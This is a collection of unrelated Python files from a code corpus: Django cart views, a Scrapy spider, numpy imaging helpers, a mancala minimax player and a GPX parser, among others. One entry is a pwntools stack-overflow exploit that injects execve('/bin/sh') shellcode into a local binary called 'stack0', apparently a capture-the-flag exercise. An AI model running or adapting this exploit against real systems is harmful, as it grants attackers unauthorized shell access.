        kwargs: Additional arguments to be passed to the constructed class.

    Returns:
        AgentSpec: The agent specifications needed to instantiate and
        configure an agent.
    """
    from smarts.zoo.agent_spec import AgentSpec

    spec = agent_registry.make(locator, **kwargs)
    assert isinstance(spec, AgentSpec), (
        f"Expected make to produce an instance of AgentSpec, got: {spec}"
    )
    return spec
def make_agent(locator: str, **kwargs):
    """Create an Agent from the given agent spec locator.

    Args:
        locator: 'path.to.file:locator-name' where the path is in the form
            `{PYTHONPATH}[n]/path/to/file.py`.
        kwargs: Additional arguments to be passed to the constructed class.

    Returns:
        Tuple[Agent, AgentInterface]: The agent and its interface.
    """
    spec = make(locator, **kwargs)
    agent = spec.build_agent()
    return agent, spec.interface
|
9,236 | 8db90b0bfde61de1c4c1462bc3bcf05ef9056362 | /Users/medrine/anaconda/lib/python2.7/UserDict.py |
9,237 | 48294209d51fbe4dfb2a5130311a10c8a1dd027c | # -*- coding:Utf-8 -*-
from .game_action_manager import GameActionManager
from .menu_action_manager import OptionsActionManager, CharacterSelectionActionManager, MainMenuActionManager
|
def main():
    """Demo: print the first/middle/last character combination of two samples."""
    first = 'mabaabm'
    second = 'moktko!'
    print(ex7(first, second))
def ex7(in1, in2):
    """Concatenate the first, middle and last characters of both strings."""
    def _fml(s):
        # first + middle + last characters of a (non-empty) string
        return s[0] + s[len(s) // 2] + s[len(s) - 1]

    return _fml(in1) + _fml(in2)
if __name__ == '__main__':
main()
|
def solution(a, b):
    """Print and return the dot product of the equal-length sequences a and b."""
    answer = sum(a[i] * b[i] for i in range(len(a)))
    print(answer)
    return answer
solution([1,2,3,4],[-3,-1,0,2]); |
9,240 | efe099bc5cd0319ffefd779f1e854f1a60edc5fa | import numpy as np
class RandomPlayer:
def __init__(self, game):
self.game = game
def play(self, board):
a = np.random.randint(self.game.getActionSize())
valids = self.game.getValidMoves(board, 1)
while valids[a] != 1:
a = np.random.randint(self.game.getActionSize())
return a
class HumanPlayer:
    """Interactive player: reads a move index from stdin until it is legal."""

    def __init__(self, game):
        self.game = game

    def play(self, board):
        # Ask repeatedly until the entered action index is valid for player 1.
        valids = self.game.getValidMoves(board, 1)
        while True:
            # Prompt kept verbatim (user-facing Vietnamese: "enter your move").
            a = int(input('Nhập nước bạn đi'))
            if valids[a]:
                break
            else:
                print('Invalid')
        return a
class MinimaxPlayer:
    """Depth-limited minimax player for an O An Quan-style mancala board.

    to_board() flattens the game's 2-D board into a 16-int list: indices 0 and
    6 hold the two big ("quan") squares, 1-5 and 7-11 the small squares,
    12/13 the two players' captured scores, 14/15 extra per-player fields.
    # NOTE(review): Move()/minimax() work on 14-element copies, so slots 14/15
    # are dropped during search — confirm against the game implementation.
    """

    def __init__(self, game):
        self.game = game

    def play(self, Board):
        # Try every (square 7-11, direction 0/1) move for this player and keep
        # the best minimax value; the move is encoded as square + direction*100.
        key = -1
        bem = -99999999  # best evaluation found so far
        board = self.to_board(Board)
        print(Board)
        print(board)
        for i in range(7, 12):
            for j in range(0, 2):
                if board[i] != 0:
                    # Work on a 14-slot copy so the real board is untouched.
                    cpboard = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 10, 10, 1, 1]
                    for k in range(14):
                        cpboard[k] = board[k]
                    self.Move(i, j, cpboard)
                    mov = self.minimax(cpboard, 0, 1)
                    if mov > bem:
                        bem = mov
                        key = i + j * 100
        return key

    def to_board(self, board):
        # Flatten the 2-row game board into the 16-slot layout described above.
        Board = [10, 5, 5, 5, 5, 5, 10, 5, 5, 5, 5, 5, 0, 0, 0, 0]
        # board.turn = self.turn
        Board[14] = board[0][7]
        Board[15] = board[1][7]
        Board[0] = board[0][5]
        Board[6] = board[1][5]
        for i in range(5):
            Board[i + 1] = board[0][i]
            Board[i + 7] = board[1][i]
        Board[12] = board[0][6]
        Board[13] = board[1][6]
        return Board

    def checkWin(self, board):
        # Returns 1 (player 1 wins), 0 (player 2 wins), 2 (draw) once both
        # quan squares are empty; 3 while the game is still in progress.
        global point1, point2
        p1 = 0
        p2 = 0
        point1 = board[12]
        point2 = board[13]
        if board[0] == 0 and board[6] == 0:
            p1 = point1 + board[1] + board[2] + board[3] + board[4] + board[5]
            p2 = point2 + board[7] + board[8] + board[9] + board[10] + board[11]
            if p1 > p2:
                return 1
            if p1 == p2:
                return 2
            else:
                return 0
        else:
            return 3

    def checkEat(self, position, direc, board):
        # Chain capture: an empty square followed by a non-empty one (skipping
        # the quan squares at indices 0 and 6) lets the mover keep capturing.
        if direc == 1:
            if board[(position + 1) % 12] == 0 and board[(position + 2) % 12] != 0 and ((position + 1) % 12) % 6 != 0:
                self.eat((position + 2) % 12, board)
                self.checkEat((position + 2) % 12, direc, board)
        else:
            if board[(position - 1) % 12] == 0 and board[(position - 2) % 12] != 0 and ((position - 1) % 12) % 6 != 0:
                self.eat((position - 2) % 12, board)
                self.checkEat((position - 2) % 12, direc, board)

    def eat(self, position, board):
        # Capture the stones on `position` into the mover's score slot.
        global point1, point2
        # NOTE(review): `self[14]` raises TypeError — the player instance is
        # not subscriptable. It was likely meant to read a turn flag (e.g.
        # board[14], which the 14-element copies do not carry). Confirm the
        # intended turn source before fixing.
        if self[14] == 1:
            board[12] = board[12] + board[position]
        else:
            board[13] = board[13] + board[position]
        board[position] = 0

    def Move(self, position, direc, board):
        # Sow the stones from `position` in direction `direc` (1 = forward),
        # then continue sowing from the landing square or attempt a capture.
        if board[position] != 0 and position != 0 and position != 6:
            if direc == 1:
                index = (position + 1) % 12
                while board[position] != 0:
                    board[position] = board[position] - 1
                    board[index] = board[index] + 1
                    index = (index + 1) % 12
                if board[index] == 0:
                    self.checkEat((index - 1 + 12) % 12, direc, board)
                else:
                    self.Move(index, direc, board)
            else:
                index = (position - 1) % 12
                while board[position] != 0:
                    board[position] = board[position] - 1
                    board[index] = board[index] + 1
                    index = (index - 1) % 12
                if board[index] == 0:
                    self.checkEat((index + 1 + 12) % 12, direc, board)
                else:
                    self.Move(index, direc, board)

    def minimax(self, board, depth, turn):
        # Depth-5 minimax; the static evaluation is board[13] - board[12]
        # (score difference in favour of this player).
        if self.checkWin(board) == 1: return -9999
        if self.checkWin(board) == 0: return 9999
        if self.checkWin(board) == 2: return 0
        if depth == 5:
            return board[13] - board[12]
        if turn == 0:
            # Maximising player moves from squares 7-11.
            best = -1000
            for i in range(7, 12):
                for j in range(0, 2):
                    if (board[i] != 0):
                        cpboard = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 10, 10, 1, 1]
                        for k in range(14):
                            cpboard[k] = board[k]
                        self.Move(i, j, cpboard)
                        vl = self.minimax(cpboard, depth + 1, (turn + 1) % 2)
                        if vl > best:
                            best = vl
            return best
        else:
            # Minimising player moves from squares 1-5.
            best = 1000
            for i in range(1, 6):
                for j in range(0, 2):
                    if (board[i] != 0):
                        cpboard = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 10, 10, 1, 1]
                        for k in range(14):
                            cpboard[k] = board[k]
                        self.Move(i, j, cpboard)
                        vl = self.minimax(cpboard, depth + 1, (turn + 1) % 2)
                        if vl < best:
                            best = vl
            return best
|
# Of tickets numbered 1..r, n winners are read from stdin; print the one
# remaining ticket, or "too late" when every ticket has already been drawn.
r, n = map(int, input().split())
if r == n:
    print("too late")
else:
    l = list(range(1, r+1))
    for _ in range(n):
        l.remove(int(input()))
    print(l[0])
|
#coding=utf-8
# Python 2 script (print statement syntax). Counts doublings of a 0.2 mm sheet
# until the running total s exceeds 8848 (Mt. Everest, in metres).
# NOTE(review): s accumulates the SUM of successive thicknesses rather than the
# folded thickness itself — confirm whether that is the intended model.
i=1
s=0
while s<=8848:
    s=s+(2**i)*0.2*10**(-3)
    i=i+1
print '对折次数:',i
|
9,243 | 26f486131bdf514cd8e41f75d414fe647eaf1140 | from typing import Union, Tuple
import numpy as np
from dispim import Volume
def extract_3d(data: np.ndarray, center: np.ndarray, half_size: int):
    """
    Extract an area around a point in a 3d numpy array, zero padded as necessary such that the specified point is at the
    center

    :param data: The numpy array to extract from
    :param center: The point around which to extract
    :param half_size: The half-size of the extracted area (full size is half_size*2+1, where the center point is
    center)
    :return: The extracted area
    """
    # FIXME: Doesn't always return the expected shape
    # Fixed: np.int was removed in NumPy 1.24; the builtin int is the
    # documented replacement and behaves identically here.
    imax = np.clip(center + half_size + 1, 0, data.shape).astype(int)
    imin = np.clip(center - half_size, 0, data.shape).astype(int)
    subvol = data[imin[0]:imax[0], imin[1]:imax[1], imin[2]:imax[2]]
    # How much of the requested cube fell outside the array on each side.
    max_missing = ((center + half_size + 1) - imax).astype(int)
    min_missing = (imin - (center - half_size)).astype(int)
    return np.pad(subvol, [(min_missing[i], max_missing[i]) for i in range(3)], mode='constant')
def crop_view(data: np.ndarray, crop: Union[float, Tuple[float, float, float]],
              center_crop: bool = True):
    """
    Get a cropped view of a 3d numpy array (does not modify the input)

    :param data: The numpy array to crop
    :param crop: The fraction of each dimension to keep (scalar, or one value per axis)
    :param center_crop: If True, the crop is centered around the middle of the volume, otherwise, the crop expands from
    (0, 0, 0)
    :return: The cropped view (no copy is made)
    """
    # Fixed idiom: isinstance instead of type(...) == ..., which also accepts
    # int/float subclasses (e.g. numpy scalar-compatible values).
    if isinstance(crop, (float, int)):
        if crop > 0.99999:
            # Nothing to crop — return the array itself.
            return data
        icropx = icropy = icropz = 1 - crop
    else:
        icropx, icropy, icropz = (1 - c for c in crop)

    w, h, l = data.shape
    if center_crop:
        # Symmetric slice: drop icrop/2 of the extent from each side.
        view = data[int(w / 2 * icropx):int(-w / 2 * icropx),
                    int(h / 2 * icropy):int(-h / 2 * icropy),
                    int(l / 2 * icropz):int(-l / 2 * icropz)]
    else:
        view = data[:int(w * (1 - icropx)), :int(h * (1 - icropy)), :int(l * (1 - icropz))]

    return view
def plot_ortho_overlayed(vol_a: Volume, vol_b: Volume, axis=2, pixel_size: float = 1.0) -> None:
    """
    Plot two axis-reduced volumes overlayed as two channels (red and green), taking into account the spacing of both volumes

    :param vol_a: The first volume to plot (red)
    :param vol_b: The second volume to plot (green)
    :param axis: The axis along which both volumes will be reduced
    :param pixel_size: The size of a pixel, relative to the spacing of the the volumes
    """
    from scipy.ndimage.interpolation import zoom
    import matplotlib.pyplot as plt

    # Resample each volume by spacing * pixel_size, then mean-project along `axis`.
    # NOTE(review): assumes Volume is array-like with a .spacing attribute so
    # zoom() accepts it directly — confirm against the dispim package.
    vol_a_zoomed = np.mean(zoom(vol_a, np.array(vol_a.spacing) * pixel_size), axis=axis)
    vol_b_zoomed = np.mean(zoom(vol_b, np.array(vol_b.spacing) * pixel_size), axis=axis)

    # Blue channel stays empty: red carries vol_a, green carries vol_b.
    b_channel = np.zeros_like(vol_a_zoomed)

    # Joint min/max normalisation so both channels share one intensity scale.
    max_val = max(vol_a_zoomed.max(), vol_b_zoomed.max())
    min_val = min(vol_a_zoomed.min(), vol_b_zoomed.min())
    vol_a_zoomed = (vol_a_zoomed - min_val) / (max_val - min_val)
    vol_b_zoomed = (vol_b_zoomed - min_val) / (max_val - min_val)

    plt.imshow(np.stack([vol_a_zoomed, vol_b_zoomed, b_channel], axis=2))
    plt.show()
def show_ipv(data: np.ndarray):
    """
    Show a 3d visualization of 3d numpy array

    :param data: The numpy array to show
    :return: The ipyvolume figure
    """
    import ipyvolume as ipv

    figure = ipv.quickvolshow(data)
    return figure
def threshold_otsu(image: np.ndarray, nbins: int = 256, ignore: int = 0) -> float:
    """
    Compute the Otsu threshold for a numpy array, without taking into account empty areas

    :param image: The volume to compute the threshold for
    :param nbins: The number of bins used
    :param ignore: The value to ignore
    :return: The Otsu threshold
    """
    from skimage.filters.thresholding import histogram

    # Check if the image is multi-colored or not
    if image.min() == image.max():
        raise ValueError("threshold_otsu is expected to work with images "
                         "having more than one color. The input image seems "
                         "to have just one color {0}.".format(image.min()))

    # Drop the `ignore` value (e.g. zero padding) before histogramming so it
    # cannot skew the class statistics.
    img_flat = image.ravel()
    img_flat = img_flat[img_flat != ignore]
    hist, bin_centers = histogram(img_flat, nbins)
    hist = hist.astype(float)

    # class probabilities for all possible thresholds
    weight1 = np.cumsum(hist)
    weight2 = np.cumsum(hist[::-1])[::-1]
    # class means for all possible thresholds
    mean1 = np.cumsum(hist * bin_centers) / weight1
    mean2 = (np.cumsum((hist * bin_centers)[::-1]) / weight2[::-1])[::-1]

    # Clip ends to align class 1 and class 2 variables:
    # The last value of `weight1`/`mean1` should pair with zero values in
    # `weight2`/`mean2`, which do not exist.
    # The threshold maximising the between-class variance is the Otsu threshold.
    variance12 = weight1[:-1] * weight2[1:] * (mean1[:-1] - mean2[1:]) ** 2

    idx = np.argmax(variance12)
    threshold = bin_centers[:-1][idx]
    return threshold
|
9,244 | 2387856757ad1c3ff911cf2a7537ca6df7786997 | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 25 12:07:32 2021
@author: yashv
"""
import numpy as np
X= [0.7, 1.5]
Y= [3.9,0.2]
def f(w, b, x):
    """Logistic sigmoid of the affine map w*x + b."""
    z = -(w * x + b)
    return 1.0 / (1.0 + np.exp(z))
def error(w, b):
    """Total half-squared loss of the sigmoid model over the module data (X, Y)."""
    total = 0.0
    for x, y in zip(X, Y):
        prediction = f(w, b, x)
        total += 0.5 * (prediction - y) ** 2
    return total
def grad_b(w, b, x, y):
    """Partial derivative of the half-squared loss w.r.t. the bias b."""
    pred = f(w, b, x)
    return (pred - y) * pred * (1 - pred)
def grad_w(w, b, x, y):
    """Partial derivative of the half-squared loss w.r.t. the weight w."""
    pred = f(w, b, x)
    return (pred - y) * pred * (1 - pred) * x
def do_gradient_descent():
    """Batch gradient descent on (w, b) for the sigmoid regression loss.

    Runs max_epochs full passes over the module-level data (X, Y), printing
    the parameters and the loss as it goes.
    """
    w, b, eta, max_epochs = 10, 10, 6.0, 1000
    for _ in range(max_epochs):
        dw, db = 0, 0
        for x, y in zip(X, Y):
            dw += grad_w(w, b, x, y)
            db += grad_b(w, b, x, y)
        w = w - eta * dw
        # Fixed: b was being updated with dw (the weight gradient) instead of
        # db, so the bias never followed its own gradient.
        b = b - eta * db
        print(w, b)
        print("e:", error(w, b))
do_gradient_descent()
|
9,245 | 47119f46cdbbb7306aef8237d4f56f0f10690ae4 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys,os,traceback
from PIL import Image
class ResizeImageBuilder:
    """Loads an image once and emits square resized copies of it."""

    def __init__(self):
        # No image loaded yet; populated by setOriginImagePath().
        self.baseImage = None

    def setOriginImagePath(self, filePath):
        """Load and RGB-convert the source image.

        Returns None on success, or an error string with the traceback.
        """
        try:
            img = Image.open(filePath)
            print('origin image mode:', img.mode)
            img = img.convert('RGB')
            print('target image mode:', img.mode)
            self.baseImage = img
            return None
        except BaseException:
            # Fixed: 'except (BaseException,e)' evaluated the undefined name e
            # (NameError), and traceback.format_exc() takes no exception
            # argument in Python 3.
            return str(filePath + " open error: " + traceback.format_exc())

    def createImageWithOriginImage(self, img, imageSize):
        """Return img resized to imageSize x imageSize with antialiasing."""
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10 in favour of
        # Image.Resampling.LANCZOS — confirm the pinned Pillow version.
        return img.resize((imageSize, imageSize), Image.ANTIALIAS)

    def saveImageWithPath(self, img, savePath):
        """Write img to savePath (format inferred from the extension)."""
        img.save(savePath)

    def createImage(self, savePath, imageSize):
        """Resize the loaded base image and save it.

        Returns an error string on failure, else None.
        """
        if self.baseImage is None:
            print('error: self.baseImage == None, please call setOriginImagePath() before createImage()')
            return
        try:
            newimg = self.createImageWithOriginImage(self.baseImage, imageSize)
            self.saveImageWithPath(newimg, savePath)
        except BaseException:
            return 'createImage error: ' + traceback.format_exc()
def main():
    """Example usage of ResizeImageBuilder, kept as a disabled sketch."""
    # builder = ResizeImageBuilder()
    # builder.setOriginImagePath(originImagePath)
    # builder.createImage(path1, size1)
    # builder.createImage(path2, size2)
    pass
if __name__ == '__main__':
main() |
9,246 | 5feea24d269409306338f772f01b0ee1d2736e2e | from django.shortcuts import render
from django.views.generic import View
from django.http import JsonResponse
from django_redis import get_redis_connection
from django.contrib.auth.mixins import LoginRequiredMixin
from good.models import GoodsSKU
class CartAddView(View):
    """Add a SKU to the logged-in user's Redis-backed cart (AJAX endpoint).

    Response codes: 0 not logged in, 1 incomplete data, 2 bad count,
    3 unknown SKU, 4 insufficient stock, 5 success.
    """

    def post(self, request):
        user = request.user
        if not user.is_authenticated:
            return JsonResponse({'res': 0, 'errmsg': '请先登录'})
        sku_id = request.POST.get('sku_id')
        count = request.POST.get('count')
        # Validate that both fields were posted.
        if not all([sku_id, count]):
            return JsonResponse({'res': 1, 'errmsg': '数据不完整'})
        # The quantity must parse as an integer.
        try:
            count = int(count)
        except Exception as e:
            return JsonResponse({'res': 2, "errmsg": '商品数目出错'})
        # The SKU must exist.
        try:
            sku = GoodsSKU.objects.get(id=sku_id)
        except GoodsSKU.DoesNotExist:
            return JsonResponse({'res': 3, 'errmsg': '商品不存在'})
        # Business logic: the cart lives in a Redis hash keyed per user.
        conn = get_redis_connection('default')
        cart_key = 'cart_%d' % user.id
        # hget returns None when the SKU is not in the hash yet.
        cart_count = conn.hget(cart_key, sku_id)
        if cart_count:
            # Accumulate onto the quantity already in the cart.
            count += int(cart_count)
        # Reject quantities beyond the available stock.
        if count > sku.stock:
            return JsonResponse({'res': 4, 'errmsg': '商品库存不足'})
        # hset inserts the SKU entry or updates it when already present.
        conn.hset(cart_key, sku_id, count)
        # Number of distinct items now in the cart.
        total_count = conn.hlen(cart_key)
        return JsonResponse({'res': 5, 'total_count': total_count, 'message': '添加成功'})
class CartInfoView(LoginRequiredMixin, View):
    """Render the cart page with per-item subtotals and overall totals."""

    def get(self, request):
        """Display the cart contents."""
        # Current user (LoginRequiredMixin guarantees authentication).
        user = request.user
        # Fetch the cart hash {sku_id: count} from Redis.
        conn = get_redis_connection('default')
        cart_key = 'cart_%d' % user.id
        cart_dict = conn.hgetall(cart_key)
        skus = []
        # Running totals across all cart entries.
        total_count = 0
        total_price = 0
        for sku_id, count in cart_dict.items():
            sku_id = int(sku_id)
            count = int(count)
            # Look up the product for this cart entry.
            sku = GoodsSKU.objects.get(id=sku_id)
            # Line subtotal for this SKU.
            amount = sku.price * count
            # Dynamic attributes consumed by the template: subtotal and quantity.
            sku.amount = amount
            sku.count = count
            skus.append(sku)
            total_count += int(count)
            total_price += amount
        # Template context.
        context = {'total_count': total_count,
                   'total_price': total_price,
                   'skus': skus}
        return render(request, 'cart2.html', context)
class UpdateCartView(View):
    """Set a cart entry to an absolute quantity (AJAX endpoint).

    Response codes: 0 not logged in, 1 incomplete data, 2 bad count,
    3 unknown SKU, 4 insufficient stock, 5 success.
    """
    # @csrf_exempt

    def post(self, request):
        user = request.user
        if not user.is_authenticated:
            return JsonResponse({'res': 0, 'errmsg': '请先登录'})
        sku_id = request.POST.get('sku_id')
        count = request.POST.get('count')
        # Validate that both fields were posted.
        if not all([sku_id, count]):
            return JsonResponse({'res': 1, 'errmsg': '数据不完整'})
        # The quantity must parse as an integer.
        try:
            count = int(count)
        except Exception as e:
            return JsonResponse({'res': 2, "errmsg": '商品数目出错'})
        # The SKU must exist.
        try:
            sku = GoodsSKU.objects.get(id=sku_id)
        except GoodsSKU.DoesNotExist:
            return JsonResponse({'res': 3, 'errmsg': '商品不存在'})
        # Business logic: overwrite the Redis hash entry with the new count.
        conn = get_redis_connection('default')
        cart_key = 'cart_%d' % user.id
        # Stock check before writing.
        if count > sku.stock:
            return JsonResponse({'res': 4, 'errmsg': '商品库存不足'})
        conn.hset(cart_key, sku_id, count)
        # Total number of units (not distinct SKUs) now in the cart.
        total_count = 0
        vals = conn.hvals(cart_key)
        for val in vals:
            total_count += int(val)
        return JsonResponse({'res': 5, 'total_count': total_count, 'message': '更新成功'})
class CartDeleteView(View):
    """Remove a SKU from the cart (AJAX endpoint).

    Response codes: 0 not logged in, 1 invalid id, 2 unknown SKU, 3 success.
    """
    # @csrf_exempt

    def post(self, request):
        """Delete one cart entry."""
        user = request.user
        if not user.is_authenticated:
            # User is not logged in.
            return JsonResponse({'res': 0, 'errmsg': '请先登录'})
        # Receive parameters.
        sku_id = request.POST.get('sku_id')
        # Validate the posted id.
        if not sku_id:
            return JsonResponse({'res': 1, 'errmsg': '无效的商品id'})
        # The SKU must exist.
        try:
            sku = GoodsSKU.objects.get(id=sku_id)
        except GoodsSKU.DoesNotExist:
            # Unknown product.
            return JsonResponse({'res': 2, 'errmsg': '商品不存在'})
        # Business logic: drop the SKU field from the Redis cart hash.
        conn = get_redis_connection('default')
        cart_key = 'cart_%d' % user.id
        # Delete via hdel.
        conn.hdel(cart_key, sku_id)
        # Total number of units left in the cart, e.g. {'1': 5, '2': 3} -> 8.
        total_count = 0
        vals = conn.hvals(cart_key)
        for val in vals:
            total_count += int(val)
        return JsonResponse({'res': 3, 'total_count': total_count, 'message': '删除成功'})
class TestView(View):
    """Debug endpoint: echoes the posted 'str' field to the console."""

    def post(self, request):
        # Renamed local so it no longer shadows the builtin `str`.
        posted = request.POST.get('str')
        print(posted)
        return JsonResponse({'res': 8, 'aaa': 'bbb'})
# Test code — unused.
class TestIndexView(LoginRequiredMixin, View):
    """Experimental cart page; currently renders 'test.html' immediately."""

    def get(self, request):
        user = request.user
        # Fetch the cart contents stored in Redis.
        # NOTE(review): the early return below makes everything after it
        # unreachable dead code; it is kept verbatim.
        return render(request, 'test.html')
        conn = get_redis_connection('default')
        cart_key = 'cart_%d' % user.id  # per-user key of the form cart_<user id>
        cart_dict = conn.hgetall(cart_key)  # stored as {sku_id: count}
        skus = []
        total_count = 0
        total_price = 0
        # Walk the cart entries.
        for sku_id, count in cart_dict.items():
            sku_id = int(sku_id)
            count = int(count)
            sku = GoodsSKU.objects.get(id=sku_id)  # look up the product by id
            # Line subtotal.
            amount = sku.price * count
            sku.amount = amount  # dynamic attribute: subtotal for the template
            sku.count = count  # dynamic attribute: quantity for the template
            skus.append(sku)
            total_count += int(count)
            total_price += amount
        context = {'total_count': total_count,
                   'total_price': total_price,
                   'skus': skus}
        return render(request, 'test.html', context)
# Test code — unused.
class Demo(View):
    """Debug view: log the posted sku_id and acknowledge with a fixed payload."""

    def post(self, request):
        posted_sku = request.POST.get('sku_id')
        print(posted_sku)
        return JsonResponse({'res': 0, 'message': 'result is success'})
|
import sqlite3

# Open the local database and print every row of the 'rupin' table.
forth = sqlite3.connect('databaserupin.db')
sql = "SELECT * from rupin;"
curforth = forth.cursor()
curforth.execute(sql)
result = curforth.fetchall()
for record in result:
    print(record)
9,248 | 10937ee1e48d23b12b76a2abc44ee8bd0647aef5 | #determines where the robot is located.
def sense(p, Z, colors, sensor_right):
    """Bayesian measurement update: reweight the belief grid p by observation Z.

    Each cell is multiplied by sensor_right when its color matches Z and by
    (1 - sensor_right) otherwise; the grid is then renormalised.
    """
    p_hit = sensor_right
    p_miss = 1 - sensor_right
    rows = len(colors)
    cols = len(colors[0])
    q = []
    total = 0
    for r in range(rows):
        weighted_row = []
        for c in range(cols):
            match = (Z == colors[r][c])
            weighted_row.append(p[r][c] * (match * p_hit + (1 - match) * p_miss))
        q.append(weighted_row)
        total += sum(weighted_row)
    # Normalise so the posterior sums to one (skip if everything was zeroed).
    if total != 0:
        for r in range(rows):
            for c in range(cols):
                q[r][c] /= total
    return q
# Moves the robot by U units (with toroidal wraparound).
def move(p, U, p_move, m, n):
    """Convolve the belief grid with a noisy translation by U.

    With probability p_move the robot moved exactly by U; otherwise it
    stayed in place.
    """
    p_exact = p_move
    p_stay = 1 - p_move  # probability of staying at the same location
    q = []
    for i in range(m):
        shifted_row = []
        for j in range(n):
            arrived = p_exact * p[(i - U[0]) % m][(j - U[1]) % n]
            shifted_row.append(arrived + p_stay * p[i][j])
        q.append(shifted_row)
    return q
# p_move: probability that the commanded motion is executed correctly.
# sensor_right: probability that the color sensor reads correctly.
def localize(colors, measurements, motions, sensor_right, p_move):
    """Run the 2-D histogram filter and return the posterior belief grid."""
    rows = len(colors)
    cols = len(colors[0])
    cells = rows * cols
    # Start from a uniform prior over all grid cells.
    p = [[1 / cells for _ in range(cols)] for _ in range(rows)]
    # Alternate prediction (move) and correction (sense) for each step.
    for step in range(len(measurements)):
        p = move(p, motions[step], p_move, rows, cols)
        p = sense(p, measurements[step], colors, sensor_right)
    return p
9,249 | 4c79dcf394acbcc9a636bcc9b0aac13a2bafc7e3 | import scrapy
from scrapy.loader import ItemLoader
class BlogSpider(scrapy.Spider):
    """Crawls the Scrapinghub blog: follows category links and scrapes titles."""
    name = 'blogspider'
    start_urls = ['https://blog.scrapinghub.com']

    def content_title_parser(self, mystr):
        # mystr is the list of extracted texts; take the 4th whitespace-split
        # word of the first entry.
        return mystr[0].split(' ')[3]

    def parse(self, response):
        # Follow every link whose href contains '/category/'.
        for url in response.css('ul li a::attr("href")').re('.*/category/.*'):
            yield scrapy.Request(response.urljoin(url), self.parse_titles)

    def parse_titles(self, response):
        # Populate a Posts item from the category page.
        l = ItemLoader(item=Posts(), response=response)
        l.add_css('content_title', 'h1.pagetitle::text', self.content_title_parser)
        l.add_css('post_title', 'div.entries > ul > li a::text')
        return l.load_item()
class Posts(scrapy.Item):
    """Scraped item: a category page's heading plus its post titles."""
    # content_title: page heading word; post_title: list of post link texts.
    content_title = scrapy.Field()
    post_title = scrapy.Field()
|
9,250 | 4e4d6a9ed07aa03c79dade05e01f226017b13de5 | import unittest
from theoktany.serializers import serialize
class SerializerTest(unittest.TestCase):
    """Unit tests for theoktany.serializers.serialize."""

    class TestObject(object):
        # Helper: arbitrary-attribute object that serialize() cannot handle.
        def __init__(self, **kwargs):
            for name, value in kwargs.items():
                self.__setattr__(name, value)

    def test_serialize(self):
        # Dict key order is unspecified, so check each pair independently.
        object_dict = {'firstName': 'Test', 'lastName': 'Test last'}
        json_str1 = '"firstName": "Test"'
        json_str2 = '"lastName": "Test last"'
        serialized_str = serialize(object_dict)
        self.assertIn(json_str1, serialized_str)
        self.assertIn(json_str2, serialized_str)

    def test_serialize_string(self):
        """Ensure that quotes are properly escaped"""
        string = 'This is a "string" with \'quotes.\''
        json_string = '"{}"'.format(string.replace('"', '\\"'))
        self.assertEqual(serialize(string), json_string)

    def test_serialize_none(self):
        """Ensure that None gets serialized to 'null'"""
        self.assertEqual(serialize(None), 'null')

    def test_serialize_object(self):
        """Ensure that the serializer throws an error for an unserializable object"""
        test_obj = self.TestObject(prop1='x', prop2=1234)
        with self.assertRaises(TypeError):
            serialize(test_obj)
if __name__ == '__main__':
unittest.main()
|
9,251 | 671ecf23df1da659d186014afa738d0608ad404d | import requests
def get(url):
    """Fetch the URL via HTTP GET and return the response body as text."""
    response = requests.get(url)
    return response.text
|
9,252 | cf70d6064fd4a43bc17cd852aaf04afade73d995 | #inject shellcode
from pwn import *

# Shellcode staged at 0x8049000: execve("/bin/sh", NULL, NULL) via int 0x80.
# NOTE(review): all addresses are specific to this './stack0' binary — verify
# them (and the 0x4c offset) against the binary before reuse.
shellcode = p32(0x8049000+0x4)\
    +asm("mov eax,SYS_execve")\
    +asm("xor ecx,ecx")\
    +asm("xor edx,edx")\
    +asm("mov ebx,0x8049014")\
    +asm("int 0x80")\
    +"/bin/sh"

r = process("./stack0", aslr=True)
# 0x4c filler bytes, then the pointers that redirect the second read and the
# saved return address into the staged shellcode.
r.sendline('A'*(0x4c)+p32(0x8049000-0x4)+p32(0x804840c)+p32(0x8049000))
r.sendline(shellcode)
r.interactive()
|
9,253 | a3d27561488c38e1256eb33abad108ad42081eb6 | from django.core.management.base import BaseCommand
from journal.models import Journal
from article.models import ArticleCoverSetting
from django.conf import settings
import os
class Command(BaseCommand):
    """Management command: reset every journal's article cover layout to defaults."""

    def handle(self, *args, **options):
        print('Loading article settings')
        # Start from a clean slate, then create one default setting per journal
        # with hard-coded layout coordinates.
        ArticleCoverSetting.objects.all().delete()
        for j in Journal.objects.all():
            s = ArticleCoverSetting()
            s.journal = j
            s.title_x = 10
            s.title_y = 100
            s.number_x = 50
            s.number_y = 70
            s.category_x = 140
            s.category_y = 80
            s.save()
            print('saving settings %s' % s.journal)
|
9,254 | cc6d18785eff0406ff7f38f18f15476375e31b76 | import re
import gpxpy
def extract_gpx_data(gpx_file_path, attribute='elevation'):
    """Reads in a GPX file and returns a list of values
    for a specified GPX attribute.

    Parameters
    ----------
    gpx_file_path : str
        File path to the GPX file (.gpx extension).

    attribute: str
        Name of the attribute to extract. Default
        value is 'elevation'. Must match one of the
        entries in the function-defined list.

    Returns
    -------
    data : list
        List containing the extracted GPX attribute values
        (floats for extension attributes; point-level values
        for the primary attributes). Empty on an invalid attribute.
    """
    # Open GPX file in context manager and parse with gpxpy
    with open(gpx_file_path) as gpx_file:
        gpx = gpxpy.parse(gpx_file)

    # Define GPX main attributes
    primary_attributes = [
        "latitude",
        "longitude",
        "elevation",
        "time"
    ]

    # Define GPX extension attributes
    secondary_attributes = [
        "cadence", "distance", "altitude",
        "energy", "speed", "verticalSpeed"
    ]

    # Check if specified attribute is in main
    # GPX attributes (lat/lon/elevation/time)
    if attribute in primary_attributes:
        # Create list of values for attribute: one per track point,
        # selected out of a per-point dict of the four primary fields.
        data = [{
            "latitude": point.latitude,
            "longitude": point.longitude,
            "elevation": point.elevation,
            "time": point.time
        }.get(attribute)
            for track in gpx.tracks
            for segment in track.segments
            for point in segment.points
        ]
        print(f"Extracted {attribute} data.")

    # Check if specified attribute is in
    # GPX extensions (cadence/distance/altitude
    # /energy/speed/verticalSpeed)
    elif attribute in secondary_attributes:
        # Define pattern for attribute to match on; extension tags are often
        # namespaced, so match the attribute name anywhere in the tag.
        pattern = re.compile(f"^.*{attribute}.*$")
        # Create list of values for attribute
        data = [
            float(extension.text)
            for track in gpx.tracks
            for segment in track.segments
